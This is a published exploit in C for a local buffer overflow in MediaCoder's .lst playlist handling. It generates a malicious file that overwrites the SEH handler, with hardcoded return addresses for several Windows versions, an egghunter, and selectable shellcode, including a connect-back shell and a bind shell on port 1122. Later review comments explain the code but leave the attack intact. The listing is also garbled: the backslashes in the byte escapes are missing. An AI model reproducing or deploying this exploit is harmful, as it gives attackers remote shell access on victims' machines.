# Title : MediaCoder (.lst) file local Buffer Overflow Exploit
# Published : 2010-03-18
# Author : fl0 fl0w
====================================================
MediaCoder (.lst) file local Buffer Overflow Exploit
====================================================
#include<stdio.h>
#include<getopt.h>
#include<string.h>
#include<windows.h>
/* Author's shorthand for C keywords and libc calls; purely textual aliases.
   Note the function-like ones do not parenthesize their arguments. */
#define PAUSE() getchar()
#define R return
#define V void
#define CONST const
#define STATIC static
#define SIZE(a) strlen(a)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define IFeq(a,b) if(a==b)
#define IFless(a,b) if(a<b)
#define IFgreat(a,b) if(a>b)
#define IFnot(a) if(!a)
#define fisier FILE
#define nul NULL
#define SPLIT(a) exit(a)
/* Banner strings printed by main() on a usage error. */
#define VER "0.7.3 build 4612 PSP edition"
#define POCNAME "MediaCoder .lst file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IFn(a,b) if(a!=b)
/* Layout of the output image built in fbuffer by main(): String_lengh is the
   number of random filler characters written first (its terminating NUL lands
   at NSEH_OFFSET, which has the same value); each *_OFFSET is the byte position
   at which main() then copies one fixed field. */
#define String_lengh 0x2FC
#define EIP_OFFSET 0x300
#define NOP_OFFSET 0x304
#define EGGHUNTER_OFFSET 0x318
#define JUNK_OFFSET 0x34A
#define TAG_OFFSET 0x81C
#define SHELL_OFFSET 0x824
#define NSEH_OFFSET 0x2FC
#define STOP break
/* Filler literal copied to NOP_OFFSET by main() (four adjacent string literals). */
#define NOP "x90x90x90x90x90"
"x90x90x90x90x90"
"x90x90x90x90x90"
"x90x90x90x90x90"
/* Integer aliases: plain char/short/int, not <stdint.h> fixed-width types. */
typedef char i8;
typedef short i16;
typedef int i32;
/* Status values main() stores in the global `err`. */
enum {True=1,False=0,Error=-1};
/* Prototypes; the definitions follow main(). Most are one-line libc wrappers. */
size_t len(const i8*);
i32 fwt(CONST V*,i32,i32,fisier*);
i32 mcpy(V*,CONST V*,i32);
i32 mset(V*,i32,i32);
i32 prinf(fisier*,CONST i8*,i8*);
i32 strcp(CONST i8*,CONST i8*);
V print(i8*);
DWORD getFsize(fisier*,i8*);
V gen_random(i8*,CONST i32);
DWORD SearchStream(CONST i8*,size_t,CONST i8*,size_t);
DWORD Findpopopret(V);
i32 stncmp(CONST i8*,CONST i8*,i32);
V help();
i32 closef(fisier*);
fisier* openf(CONST i8*,CONST i8*,fisier*);
char BeeP[]={
"x55x89xE5x83xECx18xC7x45xFC"
"x6Fx7Ax83x7C"
"xC7x44x24x04xD0x07x00x00xC7x04x24"
"x01x0Ex00x00x8Bx45xFCxFFxD0xC9xC3"
};
char ConnectBack[]={ /*ConnectBack 127.0.0.1 port 2010*/
"x31xc9xbdxcbxe3xbfxf7xb1x4fxd9xc8xd9x74x24xf4"
"x5fx31x6fx10x83xc7x04x03x6fx0cx29x16x43x1fx24"
"xd9xbcxe0x56x53x59xd1x44x07x29x40x58x43x7fx69"
"x13x01x94xfax51x8ex9bx4bxdfxe8x92x4cxeex34x78"
"x8ex71xc9x83xc3x51xf0x4bx16x90x35xb1xd9xc0xee"
"xbdx48xf4x9bx80x50xf5x4bx8fxe9x8dxeex50x9dx27"
"xf0x80x0ex3cxbax38x24x1ax1bx38xe9x79x67x73x86"
"x49x13x82x4ex80xdcxb4xaex4exe3x78x23x8fx23xbe"
"xdcxfax5fxbcx61xfcx9bxbexbdx89x39x18x35x29x9a"
"x98x9axafx69x96x57xa4x36xbbx66x69x4dxc7xe3x8c"
"x82x41xb7xaax06x09x63xd3x1fxf7xc2xecx40x5fxba"
"x48x0ax72xafxeax51x1bx1cxc0x69xdbx0ax53x19xe9"
"x95xcfxb5x41x5dxc9x42xa5x74xadxddx58x77xcdxf4"
"x9ex23x9dx6ex36x4cx76x6fxb7x99xd8x3fx17x72x98"
"xefxd7x22x70xfaxd7x1dx60x05x32x28xa7x92xc2x2b"
"x27x62x55x2ex27x63x7fxa7xc1x01x6fxeex5axbex16"
"xabx10x5fxd6x61xb0xfcx45xeex40x8ax75xb9x17xdb"
"x48xb0xfdxf1xf3x6axe3x0bx65x54xa7xd7x56x5bx26"
"x95xe3x7fx38x63xebx3bx6cx3bxbax95xdaxfdx14x54"
"xb4x57xcax3ex50x21x20x81x26x2ex6dx77xc6x9fxd8"
"xcexf9x10x8dxc6x82x4cx2dx28x59xd5x5dx63xc3x7c"
"xf6x2ax96x3cx9bxccx4dx02xa2x4ex67xfbx51x4ex02"
"xfex1exc8xffx72x0exbdxffx21x2fx94"
};
char Bindport1122[]={
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"
"x4ex36x46x52x46x32x4bx38x45x54x4ex53x4bx38x4ex37"
"x45x30x4ax57x41x30x4fx4ex4bx58x4fx54x4ax31x4bx48"
"x4fx35x42x52x41x30x4bx4ex49x34x4bx38x46x43x4bx48"
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x45x46x32x4ax32x45x37x45x4ex4bx48"
"x4fx55x46x32x41x50x4bx4ex48x56x4bx48x4ex50x4bx44"
"x4bx58x4fx45x4ex31x41x30x4bx4ex43x30x4ex32x4bx58"
"x49x38x4ex36x46x52x4ex41x41x56x43x4cx41x33x4bx4d"
"x46x56x4bx38x43x34x42x53x4bx38x42x44x4ex30x4bx48"
"x42x47x4ex51x4dx4ax4bx58x42x34x4ax30x50x45x4ax46"
"x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x56"
"x43x55x48x36x4ax36x43x33x44x33x4ax46x47x57x43x57"
"x44x43x4fx45x46x35x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
"x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x38x4dx4ex4ax50x44x50x45x35x4cx56x44x30"
"x4fx4fx42x4dx4ax36x49x4dx49x50x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x55x43x45x43x45x43x35x43x35x43x44"
"x43x35x43x34x43x45x4fx4fx42x4dx48x36x4ax36x46x50"
"x44x36x48x36x43x35x49x38x41x4ex45x49x4ax36x46x4a"
"x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"
"x41x55x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d"
"x4ax36x45x4ex49x44x48x58x49x54x47x55x4fx4fx48x4d"
"x42x55x46x35x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x47x48x4cx49x37x47x55x4fx4fx48x4dx45x35"
"x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax46x43x56"
"x4dx36x49x38x45x4ex4cx36x42x35x49x45x49x32x4ex4c"
"x49x38x47x4ex4cx56x46x34x49x58x44x4ex41x43x42x4c"
"x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56"
"x44x57x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f"
"x48x4dx4bx45x47x55x44x45x41x45x41x35x41x45x4cx56"
"x41x50x41x45x41x55x45x55x41x55x4fx4fx42x4dx4ax36"
"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx58x47x35x4ex4f"
"x43x58x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d"
"x4ax56x42x4fx4cx38x46x30x4fx35x43x35x4fx4fx48x4dx4fx4fx42x4dx5a"
};
i8 Calculator[]={
"xbax20xf0xfdx7fxc7x02x4cxaaxf8x77x33xC0x50x68x63x61x6Cx63"
"x54x5Bx50x53xB9xC7x93xC2x77xFFxD1xEBxF7"
};
i8 egghunter[]={/*IsBadReadPtr egghunter 32 bytes*/
"x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x66x6Cx30x77" //fl0w tag
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7"
};
i8 tag[]={"x66x6Cx30x77"
"x66x6Cx30x77"
};
/* File-scope state shared by main() and the helpers. `x` and `retcode` are not
   referenced anywhere in this file. */
i32 j,i,x,custom=0,err; /* j: hex-digit loop index; custom: 1 when target 4 (user address); err: True/Error status */
i8 c,shellbuffer[0x3E8],fbuffer[0xF4240],retcode[10]; /* c: scratch char; shellbuffer: selected payload (zero-filled until chosen); fbuffer: output file image */
DWORD ret; /* 4-byte value copied into fbuffer at EIP_OFFSET */
/*
 * Program entry point: generates the .lst file described in the page title.
 * Command line (see help()): -f <file> -s <shellcode 1-4> -t <target 1-4> [0xXXXXXXXX].
 * Flow: argument checks -> choose the 4-byte `ret` value for the target ->
 * choose the payload -> assemble fbuffer -> fwrite() it -> print the file size.
 * Always returns 0. NOTE(review): argument errors only print a message; the
 * switch and the file write below still run, and with fewer than seven
 * arguments argv[2]/argv[4] lie past the end of argv.
 */
i32 main(i32 argc,i8** argv)
{ ((argc==7)||(argc==8)&&(atoi(argv[4])>0)&&(atoi(argv[6])>0)&&(atoi(argv[4])<6)||(argc==8)&&(atoi(argv[7])==4))?(err=True):(err=Error);
/* && binds tighter than ||: argc==7 alone sets err=True, so the 7-argument
   form gets no range check on argv[4]/argv[6]. */
IFeq(err,True){
/* Flags must be exactly "-f", "-s", "-t" at argv[1], argv[3], argv[5]. */
((strcp(argv[1],"-f")==0)&&(len(argv[1])==2)&&(strcp(argv[3],"-s")==0)&&(len(argv[3])==2)&&(strcp(argv[5],"-t")==0)&&(len(argv[5])==2))?(err=True):(err=Error);
IFeq(err,True){
/* Target number -> 4 raw bytes in `ret`; target 4 means a user-supplied address (custom=1). */
(atoi(argv[6])==1)?(mcpy(&ret,"x26x59x01x66",4)):(atoi(argv[6])==2)?(mcpy(&ret,"xB8x15xD1x72",4)):(atoi(argv[6])==3)?(mcpy(&ret,"x83x27x90x7C",4)):(atoi(argv[6])==4)?(custom=1):(custom=0);
IFeq(custom,1){
/* Custom address must be "0x" followed by 8 characters (10 in total). */
if((strncmp(argv[7],"0x",(sizeof(i8)*2))==0)&&(len(argv[7])==10)){
/* Hex-digit check, 8 characters from index 2 down to 0. As written it reads
   argv[1] ("-f" after the check above), so the indexes run past that string's
   terminator, and the `err` it produces is never consulted. */
for(j=(sizeof(char) * 8) - 1; (j >= 0);j--) {
c = *(argv[1] + j + 2);
((c>=48)&&(c<=57)||(c>=65)&&(c<=70)||(c>=97)&&(c<=102))?(err=1):(err=-1);
}
sscanf(argv[7],"%x",&ret); /* parse the hex address into ret */
}
else
print("syntax error 0x not found");
}
}
else
print("syntax error ,target must be in range[1-4]");
}
else {
/* Usage error: clear the console (fixed command string), print banner and help. */
system("cls");
printf("[#]%sn[#]Ver %sn[#]Author %sn",POCNAME,VER,AUTHOR);
help();
}
/* Payload selection. mcpy() copies strlen(source) bytes, not the length given
   here. There is no default case: an out-of-range choice leaves shellbuffer
   as the zero-filled file-scope array. */
switch(atoi(argv[4])){
case 1: mcpy(shellbuffer,ConnectBack,SIZE(ConnectBack));
STOP;
case 2: mcpy(shellbuffer,Bindport1122,0x2C5);
STOP;
case 3: mcpy(shellbuffer,Calculator,0x20);
STOP;
case 4: mcpy(shellbuffer,BeeP,0x13);
STOP;
}
/* Assemble the file image: random filler (NUL-terminated at String_lengh, which
   equals NSEH_OFFSET), then the fixed fields at their offsets, 0x4D2 bytes of
   0x58 at JUNK_OFFSET, the tag, and finally the selected payload. */
gen_random(fbuffer,String_lengh);
mcpy(fbuffer+NSEH_OFFSET,"xEBx06x90x90",4);
mcpy(fbuffer+EIP_OFFSET,&ret,4);
mcpy(fbuffer+NOP_OFFSET,NOP,0x14);
mcpy(fbuffer+EGGHUNTER_OFFSET,egghunter,0x20);
mset(fbuffer+JUNK_OFFSET,0x58,0x4D2);
mcpy(fbuffer+TAG_OFFSET,tag,8);
mcpy(fbuffer+SHELL_OFFSET,shellbuffer,len(shellbuffer));
/* Write SHELL_OFFSET + payload-length bytes. fopen() is not checked, so a NULL
   stream would reach fwrite()/fclose(). */
fisier* f=fopen(argv[2],"wb");
fwt(fbuffer,1,0x824+len(shellbuffer),f);
closef(f);
PAUSE(); /* wait for a keypress before the final report */
print("DONE!");
/* getFsize() ignores the (already closed) stream and reopens argv[2] by name. */
printf("[!]File is %d bytes",getFsize(f,argv[2]));
R 0;
}
size_t len(const char *str)
{
    /* Length of a NUL-terminated string, excluding the terminator.
       Passing NULL is undefined behaviour, exactly as with strlen(). */
    return strlen(str);
}
int fwt(const void *ptr, int sz, int elem, FILE *fname)
{
    /* fwrite() pass-through: writes `elem` items of `sz` bytes each from `ptr`
       to `fname`. Returns the number of items written, narrowed to int. */
    size_t written = fwrite(ptr, (size_t)sz, (size_t)elem, fname);
    return (int)written;
}
/*
 * memcpy() wrapper. The `len` parameter is not the copy length: the line
 * `len=SIZE(source)` replaces it with strlen(source), so exactly
 * strlen(source) bytes are copied from `source` to `dest` and that count is
 * returned. `CONST* S` declares S with an implicit base type (int), which
 * C99 and later compilers reject.
 */
i32 mcpy(V* dest,CONST V* source,i32 len)
{ V* D=dest;
CONST* S=source; /* implicit-int pointer declaration; see header comment */
len=SIZE(source); /* caller's length is discarded in favour of strlen(source) */
memcpy(D,S,len);
R len;
}
i32 mset(V* ptr,i32 val,i32 len)
{ V* f=ptr;
i32 valoare=val;
memset(f,val,len);
R len;
}
int prinf(FILE *str, const char *format, char *buffer)
{
    /* fprintf() pass-through with one string argument. `format` is handed to
       fprintf() unchanged, so it must be a trusted literal — never text read
       from a file or the command line. Returns whatever fprintf() returns. */
    return fprintf(str, format, buffer);
}
int strcp(const char *str1, const char *str2)
{
    /* strcmp() pass-through: <0, 0 or >0 as str1 sorts before, equal to or
       after str2. Despite the name it compares; it does not copy. */
    return strcmp(str1, str2);
}
int stncmp(const char *str1, const char *str2, int num)
{
    /* strncmp() pass-through over at most `num` characters; `num` is
       converted to size_t, so a negative value becomes a huge bound. */
    return strncmp(str1, str2, (size_t)num);
}
void print(char *msg)
{
    /* Status line on stdout: "[*]" followed by msg. The format string is the
       original one; each line ends with a bare "n" in this listing. */
    fprintf(stdout, "[*]%sn", msg);
}
void gen_random(char *s, const int len)
{
    /* Fill s[0..len) with pseudo-random characters from [0-9A-Za-z] and write
       a NUL at s[len]; the caller must provide len + 1 bytes. Uses rand() —
       nothing in this file calls srand(), so the sequence repeats on every
       run. A negative len skips the loop and then stores s[len] out of range. */
    static const char alphanum[] =
        "0123456789ABCDEFGHIJKLMNOPQRST"
        "UVWXYZabcdefghijklmnopqrstuvwxyz";
    const int nchars = (int)(sizeof alphanum - 1);
    for (int k = 0; k < len; ++k) {
        s[k] = alphanum[rand() % nchars];
    }
    s[len] = '\0';
}
void help(void)
{
    /* Usage banner on stdout. The text is the author's original;
       NOTE(review): each line ends in a bare "n", presumably a "\n" escape
       whose backslash was lost in this listing. */
    static const char usage[] =
        "***************************************************************************n"
        "* syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] 0xFFFFFFFF *n"
        "* -f filename *n"
        "* -s shellcode to run [1,5] *n"
        "* -t target [1,4] *n"
        "* example: mediac.exe -f vuln.lst -s 2 -t 1 *n"
        "* mediac.exe -f vuln.lst -s 4 0xFFFFFFFF *n"
        "* Shellcode 1.ConnectBack 127.0.0.1 port 2010 *n"
        "* 2.Bindport1122 *n"
        "* 3.Calculator *n"
        "* 4.BeeP *n"
        "* Targets 1.Universal *n"
        "* 2.Windows xp sp2 en kernel32.dll *n"
        "* 3.Windows sp3 en ntdll.dll *n"
        "* 4.Windows xp sp1 en *n"
        "***************************************************************************n";
    fputs(usage, stdout);
}
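DWORD getFsize(FILE *g, char *gname)
{
    /* Size in bytes of the file named `gname`. The stream parameter is
       ignored and overwritten: the file is reopened by name, which is why
       main() can pass an already-closed handle. If the open fails, prints a
       message and exits. If fseek()/ftell() fail, returns (DWORD)-1.
       The stream opened here is closed before returning so the handle does
       not leak. */
    g = fopen(gname, "rb");
    if (g == NULL) {
        print("File error at reading");
        exit(0);
    }
    long size = -1L;
    if (fseek(g, 0, SEEK_END) == 0) {
        size = ftell(g);
    }
    fclose(g);
    return (DWORD)size;
}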
int closef(FILE *stream)
{
    /* fclose() pass-through: 0 on success, EOF on error. Closing a NULL or
       already-closed stream is undefined behaviour, as with fclose(). */
    return fclose(stream);
}